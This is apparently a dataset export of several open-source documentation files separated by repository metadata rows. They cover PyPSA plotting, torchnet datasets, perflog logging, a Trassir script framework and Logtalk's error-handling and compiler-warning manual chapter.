``network.plot()``, see :py:meth:`pypsa.Network.plot` for details.
See also the `SciGRID matplotlib example
<https://pypsa.readthedocs.io/en/latest/examples/scigrid-lopf-then-pf.html>`_.
Interactive plotting with plotly
================================
Interactive network plots can be created using the `d3js
<https://d3js.org/>`_-based library `plotly
<https://plot.ly/python/>`_ (this uses JavaScript and SVGs). This is
meant for use with `Jupyter notebooks <https://jupyter.org/>`_.
To plot a network with plotly run
``network.iplot()``, see :py:meth:`pypsa.Network.iplot` for details.
| 33.647059 | 78 | 0.689685 |
92530e625a655ebc7fe968628a4bd8c0a0b75614 | 1,471 | rst | reStructuredText | docs/source/torchnet.dataset.rst | HarshTrivedi/tnt | 4bd49afaa936e888ea1020a4f9ef54613beea559 | [
"BSD-3-Clause"
] | 1,463 | 2017-01-18T22:59:37.000Z | 2022-03-31T01:58:02.000Z | docs/source/torchnet.dataset.rst | HarshTrivedi/tnt | 4bd49afaa936e888ea1020a4f9ef54613beea559 | [
"BSD-3-Clause"
] | 105 | 2017-01-18T20:30:01.000Z | 2021-12-31T15:08:18.000Z | docs/source/torchnet.dataset.rst | HarshTrivedi/tnt | 4bd49afaa936e888ea1020a4f9ef54613beea559 | [
"BSD-3-Clause"
] | 236 | 2017-01-18T20:17:32.000Z | 2022-02-16T06:41:40.000Z | .. role:: hidden
:class: hidden-section
torchnet.dataset
========================
.. automodule:: torchnet.dataset
.. currentmodule:: torchnet.dataset
Provides a :class:`Dataset` interface, similar to vanilla PyTorch.
.. autoclass:: torchnet.dataset.dataset.Dataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`BatchDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: BatchDataset
:members:
:show-inheritance:
:hidden:`ConcatDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ConcatDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`ListDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ListDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`ResampleDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ResampleDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`ShuffleDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ShuffleDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`SplitDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: SplitDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`TensorDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: TensorDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`TransformDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: TransformDataset
:members:
:undoc-members:
:show-inheritance:
| 19.613333 | 66 | 0.552685 |
f604fffa4a2472b73f7ff921376d527853d33c21 | 240 | rst | reStructuredText | modules/photons_canvas/font/README.rst | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 51 | 2020-07-03T08:34:48.000Z | 2022-03-16T10:56:08.000Z | modules/photons_canvas/font/README.rst | delfick/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 81 | 2020-07-03T08:13:59.000Z | 2022-03-31T23:02:54.000Z | modules/photons_canvas/font/README.rst | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 8 | 2020-07-24T23:48:20.000Z | 2021-05-24T17:20:16.000Z | Making the alphabet fonts
=========================
The alphabet fonts are made using the font from
https://fontstruct.com/fontstructions/show/25590/amstrad_cpc_extended
And converted using the ``_generate_alphabet.py`` in this directory
| 30 | 69 | 0.7375 |
126f87202d709a6f0e6f9b558f384ca0a9a13092 | 1,866 | rst | reStructuredText | README.rst | cjrh/perflog | 0122d66070a634a48978acf5eaed0f2cfcdb866e | [
"Apache-2.0"
] | null | null | null | README.rst | cjrh/perflog | 0122d66070a634a48978acf5eaed0f2cfcdb866e | [
"Apache-2.0"
] | 2 | 2017-08-08T05:48:29.000Z | 2017-08-08T05:48:49.000Z | README.rst | cjrh/perflog | 0122d66070a634a48978acf5eaed0f2cfcdb866e | [
"Apache-2.0"
] | null | null | null | .. image:: https://travis-ci.org/cjrh/perflog.svg?branch=master
:target: https://travis-ci.org/cjrh/perflog
.. image:: https://coveralls.io/repos/github/cjrh/perflog/badge.svg?branch=master
:target: https://coveralls.io/github/cjrh/perflog?branch=master
.. image:: https://img.shields.io/pypi/pyversions/perflog.svg
:target: https://pypi.python.org/pypi/perflog
.. image:: https://img.shields.io/github/tag/cjrh/perflog.svg
:target: https://img.shields.io/github/tag/cjrh/perflog.svg
.. image:: https://img.shields.io/badge/install-pip%20install%20perflog-ff69b4.svg
:target: https://img.shields.io/badge/install-pip%20install%20perflog-ff69b4.svg
.. image:: https://img.shields.io/pypi/v/perflog.svg
:target: https://img.shields.io/pypi/v/perflog.svg
perflog
=======
**Structured logging support for application performance and monitoring data**
Demo
----
.. code:: python
   """ My Application """

   import perflog

   def main():
       ...  # all the usual application code goes here

   if __name__ == '__main__':
       perflog.set_and_forget()
       main()
There are several parameters for the ``set_and_forget`` method that can be
used to change the default behaviour. For example, by default the performance
log messages will be written every 60 seconds.
Note: in addition to writing performance data to the log message itself,
``perflog`` also adds *extra logrecord fields*. This means that if you're
using a log formatter that writes out all the fields in some kind of
structured format (say, logstash_formatter), you will find that the performance
data will also be recorded in those fields and can therefore be accessed in
tools like Kibana.
Acknowledgements
----------------
``perflog`` uses `psutil <https://github.com/giampaolo/psutil>`_ to
obtain all the process-related information. Thanks Giampaolo!
| 31.627119 | 84 | 0.72776 |
2d028bf04bb693f45241d5da63108a8337455894 | 219 | rst | reStructuredText | docs/glasses.models.segmentation.base.rst | rentainhe/glasses | 34300a76985c7fc643094fa8d617114926a0ee75 | [
"MIT"
] | 271 | 2020-10-20T12:30:23.000Z | 2022-03-17T03:02:38.000Z | docs/glasses.models.segmentation.base.rst | rentainhe/glasses | 34300a76985c7fc643094fa8d617114926a0ee75 | [
"MIT"
] | 212 | 2020-07-25T13:02:23.000Z | 2022-02-20T10:33:32.000Z | docs/glasses.models.segmentation.base.rst | rentainhe/glasses | 34300a76985c7fc643094fa8d617114926a0ee75 | [
"MIT"
] | 23 | 2021-01-03T13:53:36.000Z | 2022-03-17T05:40:34.000Z | glasses.models.segmentation.base package
========================================
Module contents
---------------
.. automodule:: glasses.models.segmentation.base
:members:
:undoc-members:
:show-inheritance:
| 19.909091 | 48 | 0.561644 |
f9f22eaf66dd844840eefdff20977a4fb03e6ae3 | 1,011 | rst | reStructuredText | docs/source/index.rst | aatrubilin/trassir_script_framework | 2a850a974688b2c357692265bacfe82c233b825f | [
"MIT"
] | 8 | 2019-08-17T09:14:22.000Z | 2021-12-31T09:30:35.000Z | docs/source/index.rst | aatrubilin/trassir_script_framework | 2a850a974688b2c357692265bacfe82c233b825f | [
"MIT"
] | 1 | 2019-04-30T00:34:15.000Z | 2019-04-30T00:34:15.000Z | docs/source/index.rst | AATrubilin/trassir_script_framework | 2a850a974688b2c357692265bacfe82c233b825f | [
"MIT"
] | 5 | 2019-09-18T14:29:30.000Z | 2021-12-31T09:30:41.000Z | .. Trassir Script Framework documentation master file, created by
sphinx-quickstart on Mon Apr 1 14:38:36 2019.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Trassir Script Framework's documentation!
====================================================
| *A framework for Trassir automation scripts.*
| *To use the framework, copy the* `source code
  <https://github.com/AATrubilin/trassir_script_framework/blob/master/trassir_script_framework.py>`_
  *into your script.*
| Usage examples for the framework are available at this `link
  <https://github.com/AATrubilin/trassir_script_framework/tree/master/examples>`_
| Additional information about scripts is available in the `documentation
  <https://www.dssl.ru/files/trassir/manual/ru/setup-script-feature.html>`_
.. toctree::
script_framework
Changelog
=========
.. toctree::
:maxdepth: 2
changelog
Indices and tables
==================
* :ref:`genindex`
* :ref:`search`
| 27.324324 | 100 | 0.706231 |
1a03be2ac9c8de9f2576ef8f6b8e1fe5accff87f | 13,354 | rst | reStructuredText | manuals/sources/userman/errors.rst | aarroyoc/logtalk3 | c737a00f0293cfc1fdd85e5b704a6d2524b6d29a | [
"Apache-2.0"
] | null | null | null | manuals/sources/userman/errors.rst | aarroyoc/logtalk3 | c737a00f0293cfc1fdd85e5b704a6d2524b6d29a | [
"Apache-2.0"
] | null | null | null | manuals/sources/userman/errors.rst | aarroyoc/logtalk3 | c737a00f0293cfc1fdd85e5b704a6d2524b6d29a | [
"Apache-2.0"
] | null | null | null | ..
This file is part of Logtalk <https://logtalk.org/>
Copyright 1998-2022 Paulo Moura <pmoura@logtalk.org>
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
.. _errors_errors:
Error handling
==============
Error handling is accomplished in Logtalk by using the standard ``catch/3``
and ``throw/1`` predicates [ISO95]_ together with a set of built-in methods
that simplify generating errors decorated with expected context.
Errors thrown by Logtalk have, whenever possible, the following format:
::
error(Error, logtalk(Goal, ExecutionContext))
In this exception term, ``Goal`` is the goal that triggered the error
``Error`` and ``ExecutionContext`` is the context in which ``Goal`` is
called. For example:
::
error(
permission_error(modify,private_predicate,p),
logtalk(foo::abolish(p/0), _)
)
Note, however, that ``Goal`` and ``ExecutionContext`` can be unbound or only
partially instantiated when the corresponding information is not available
(e.g. due to compiler optimizations that throw away the necessary error context
information). The ``ExecutionContext`` argument is an opaque term that
can be decoded using the
:ref:`logtalk::execution_context/7 <logtalk/0::execution_context/7>` predicate.
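The execution context term can be decoded, for example, in the recovery
goal of a ``catch/3`` call. The following is only a sketch: the variable
names are illustrative and ``handle_error/6`` is a hypothetical user
predicate, not part of any library.

::

   ...,
   catch(
       Goal,
       error(Error, logtalk(Culprit, ExecutionContext)),
       (   logtalk::execution_context(ExecutionContext, Entity, Sender, This, Self, _, _),
           % use e.g. Entity, the entity whose code called Culprit,
           % to report or recover from the error
           handle_error(Error, Culprit, Entity, Sender, This, Self)
       )
   ),
   ...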
Raising Exceptions
------------------
The :ref:`error handling section <error_handling_methods>` in the reference
manual lists a set of convenient built-in methods that generate ``error/2``
exception terms with the expected context argument. For example, instead of
manually constructing a type error as in:
::
...,
context(Context),
throw(error(type_error(atom, 42), Context)).
we can simply write:
::
...,
type_error(atom, 42).
The provided error built-in methods cover all standard error types found in
the ISO Prolog Core standard.
Type-checking
-------------
One of the most common case where errors may be generated is when
type-checking predicate arguments and input data before processing it.
The standard library includes a :ref:`type <apis:type/0>` object that
defines an extensive set of types, together with predicates for validating
and checking terms. The set of types is user extensible and new types can
be defined by adding clauses for the ``type/1`` and ``check/2`` multifile
predicates. For example, assume that we want to be able to check
*temperatures* expressed in Celsius, Fahrenheit, or Kelvin scales. We
start by declaring (in an object or category) the new type:
::
:- multifile(type::type/1).
type::type(temperature(_Unit)).
Next, we need to define the actual code that would verify that a temperature
is valid. As the different scales use a different value for absolute zero,
we can write:
::
:- multifile(type::check/2).
type::check(temperature(Unit), Term) :-
check_temperature(Unit, Term).
% given that temperature has only a lower bound, we make use of the library
% property/2 type to define the necessary test expression for each unit
check_temperature(celsius, Term) :-
type::check(property(float, [Temperature]>>(Temperature >= -273.15)), Term).
check_temperature(fahrenheit, Term) :-
type::check(property(float, [Temperature]>>(Temperature >= -459.67)), Term).
check_temperature(kelvin, Term) :-
type::check(property(float, [Temperature]>>(Temperature >= 0.0)), Term).
With this definition, a term is first checked to be a float value and
then checked to fall within the valid range for the scale. But how do
we use this new type? If we just want to test if a temperature is
valid, we can write:
::
..., type::valid(temperature(celsius), 42.0), ...
The :ref:`type::valid/2 <apis:type/0::valid/2>` predicate succeeds or fails
depending on the second argument being of the type specified in the first
argument. If instead of success or failure we want to generate an error for
invalid values, we can use the :ref:`type::check/2 <apis:type/0::check/2>`
predicate instead:
::
..., type::check(temperature(celsius), 42.0), ...
If we require an ``error/2`` exception term with the error context, we can
use instead the :ref:`type::check/3 <apis:type/0::check/3>` predicate:
::
...,
context(Context),
type::check(temperature(celsius), 42.0, Context),
...
Note that ``context/1`` calls are inlined and messages to the library
``type`` object use :term:`static binding` when compiling with the
:ref:`optimize flag <flag_optimize>` turned on, thus enabling efficient
type-checking.
Expected terms
--------------
Support for representing and handling *expected terms* is provided by the
:doc:`../libraries/expecteds` library. Expected terms allows defering errors
to later stages of an application in alternative to raising an exception as
soon as an error is detected.
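As a sketch of the idea (the predicate names follow the library
documentation, but check the current library API before relying on
them), a conversion error can be captured in an expected term and only
dealt with when the value is finally needed:

::

   ...,
   % wrap the outcome of the goal: either the computed Number
   % or the error term given when the goal fails or throws
   expected::from_goal(number_codes(Number, Codes), Number, not_a_number, Expected),
   ...,
   % later, extract the value or fall back to a default
   expected(Expected)::or_else(Value, 0),
   ...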
Compiler warnings and errors
----------------------------
The current Logtalk compiler uses the standard ``read_term/3`` built-in
predicate to read and compile a Logtalk source file. This improves the
compatibility with :term:`backend Prolog compilers <backend Prolog compiler>`
and their proprietary syntax extensions and standard compliance quirks. But one
consequence of this design choice is that invalid Prolog terms or syntax errors
may abort the compilation process with limited information given to the user
(due to the inherent limitations of the ``read_term/3`` predicate).
Assuming that all the terms in a source file are valid, there is a set of
errors and potential errors, described below, that the compiler will try
to detect and report, depending on the used compiler flags (see the
:ref:`programming_flags` section of this manual on lint flags for details).
.. _errors_unknown:
Unknown entities
~~~~~~~~~~~~~~~~
The Logtalk compiler warns about any referenced entity that is not
currently loaded. The warning may reveal a misspelled entity name or
just an entity that will be loaded later. Out-of-order loading should be
avoided when possible as it prevents some code optimizations such as
:term:`static binding` of messages to methods.
.. _errors_singletons:
Singleton variables
~~~~~~~~~~~~~~~~~~~
Singleton variables in a clause are often misspelled variables and, as
such, one of the most common sources of errors when programming in Prolog.
Assuming that the :term:`backend Prolog compiler` implementation of the
``read_term/3`` predicate supports the standard ``singletons/1``
option, the compiler warns about any singleton variable found while
compiling a source file.
.. _errors_prolog:
Redefinition of Prolog built-in predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Logtalk compiler will warn us of any redefinition of a Prolog
built-in predicate inside an object or category. Sometimes the redefinition
is intended. In other cases, the user may not be aware that a particular
:term:`backend Prolog compiler` may already provide the predicate
as a built-in predicate or may want to ensure code portability among
several Prolog compilers with different sets of built-in predicates.
.. _errors_redefinition_predicates:
Redefinition of Logtalk built-in predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Similar to the redefinition of Prolog built-in predicates, the Logtalk
compiler will warn us if we try to redefine a Logtalk built-in. But the
redefinition will probably be an error in most (if not all) cases.
.. _errors_redefinition_methods:
Redefinition of Logtalk built-in methods
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An error will be thrown if we attempt to redefine a Logtalk built-in
method inside an entity. The default behavior is to report the error and
abort the compilation of the offending entity.
.. _errors_misspell:
Misspelled calls to local predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A warning will be reported if Logtalk finds (in the body of a predicate
definition) a call to a local predicate that is not defined, built-in
(either in Prolog or in Logtalk) or declared dynamic. In most cases
these calls are simple misspelling errors.
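For example (an illustrative sketch), assuming a predicate ``bar/0`` is
defined but ``bra/0`` is not:

::

   foo :-
       % 'bra' is a typo for 'bar'; as no bra/0 predicate is defined,
       % declared dynamic, or built-in, a warning is reported
       bra.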
.. _errors_portability:
Portability warnings
~~~~~~~~~~~~~~~~~~~~
A warning will be reported if a predicate clause contains a call to a
non-standard built-in predicate or arithmetic function. Portability
warnings are also reported for non-standard flags or flag values. These
warnings often cannot be avoided due to the limited scope of the ISO
Prolog standard.
.. _errors_deprecated:
Deprecated elements
~~~~~~~~~~~~~~~~~~~
A warning will be reported if a deprecated directive, control construct,
or predicate is used. These warnings should be fixed as soon as possible
as support for any deprecated features will likely be discontinued in
future versions.
.. _errors_missing_directives:
Missing directives
~~~~~~~~~~~~~~~~~~
A warning will be reported for any missing dynamic, discontiguous,
meta-predicate, and public predicate directive.
.. _errors_duplicated_directives:
Duplicated directives
~~~~~~~~~~~~~~~~~~~~~
A warning will be reported for any duplicated scope, multifile, dynamic,
discontiguous, meta-predicate, and meta-non-terminal directives. Note
that conflicting directives for the same predicate are handled as
errors, not as duplicated directive warnings.
.. _errors_duplicated_clauses:
Duplicated clauses
~~~~~~~~~~~~~~~~~~
A warning will be reported for any duplicated entity clauses. This check
is computationally heavy, however, and usually turned off by default.
.. _errors_always_true_or_false_goals:
Goals that are always true or false
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A warning will be reported for any goal that is always true or false.
This is usually caused by typos in the code. For example, writing
``X == y`` instead of ``X == Y``.
.. _errors_trivial_fails:
Trivial fails
~~~~~~~~~~~~~
A warning will be reported for any call to a local static predicate with
no matching clause.
.. _errors_suspicious_calls:
Suspicious calls
~~~~~~~~~~~~~~~~
A warning will be reported for calls that are syntactically correct but most
likely a semantic error. An example is :ref:`control_send_to_self_1` calls in
clauses that apparently are meant to implement recursive predicate definitions
where the user intention is to call the local predicate definition.
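For example (an illustrative sketch), in the following definition the
``::/1`` control construct sends the ``count(Tail, M)`` message to
*self*, which is likely unintended when the goal was simply to call the
local ``count/2`` definition:

::

   count([], 0).
   count([_| Tail], N) :-
       % suspicious: calls count/2 in "self" instead of the
       % local definition
       ::count(Tail, M),
       N is M + 1.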
.. _errors_lambda_variables:
Lambda variables
~~~~~~~~~~~~~~~~
A warning will be reported for :term:`lambda expressions <lambda expression>`
with unclassified variables (not listed as either :term:`lambda free <lambda free variable>`
or :term:`lambda parameter` variables), for variables playing a dual role
(as both lambda free and lambda parameter variables), and for lambda parameters
used elsewhere in a clause.
.. _errors_predicate_redefinition:
Redefinition of predicates declared in ``uses/2`` or ``use_module/2`` directives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A error will be reported for any attempt to define locally a predicate
that is already declared in an :ref:`directives_uses_2` or
:ref:`directives_use_module_2` directive.
.. _errors_others:
Other warnings and errors
~~~~~~~~~~~~~~~~~~~~~~~~~
The Logtalk compiler will throw an error if it finds a predicate clause
or a directive that cannot be parsed. The default behavior is to report
the error and abort the compilation.
.. _errors_runtime:
Runtime errors
--------------
This section briefly describes runtime errors that result from misuse of
Logtalk built-in predicates, built-in methods or from message sending.
For a complete and detailed description of runtime errors please consult
the Reference Manual.
.. _errors_predicates:
Logtalk built-in predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Most Logtalk built-in predicates check the type and mode of the calling
arguments, throwing an exception in case of misuse.
.. _errors_methods:
Logtalk built-in methods
~~~~~~~~~~~~~~~~~~~~~~~~
Most Logtalk built-in methods check the type and mode of the calling
arguments, throwing an exception in case of misuse.
.. _errors_sending:
Message sending
~~~~~~~~~~~~~~~
The message sending mechanisms always check if the receiver of a message
is a defined object and if the message corresponds to a declared
predicate within the scope of the sender. The built-in protocol
:ref:`forwarding <apis:forwarding/0>` declares a predicate,
:ref:`methods_forward_1`, which is automatically called (if defined) by
the runtime for any message that the receiving object does not understand.
The usual definition for this error handler is to delegate or forward the
message to another object that might be able to answer it:
::
forward(Message) :-
% forward the message while preserving the sender
[Object::Message].
If preserving the original sender is not required, this definition can
be simplified to:
::
forward(Message) :-
Object::Message.
More sophisticated definitions are, of course, possible.
| 34.153453 | 92 | 0.737382 |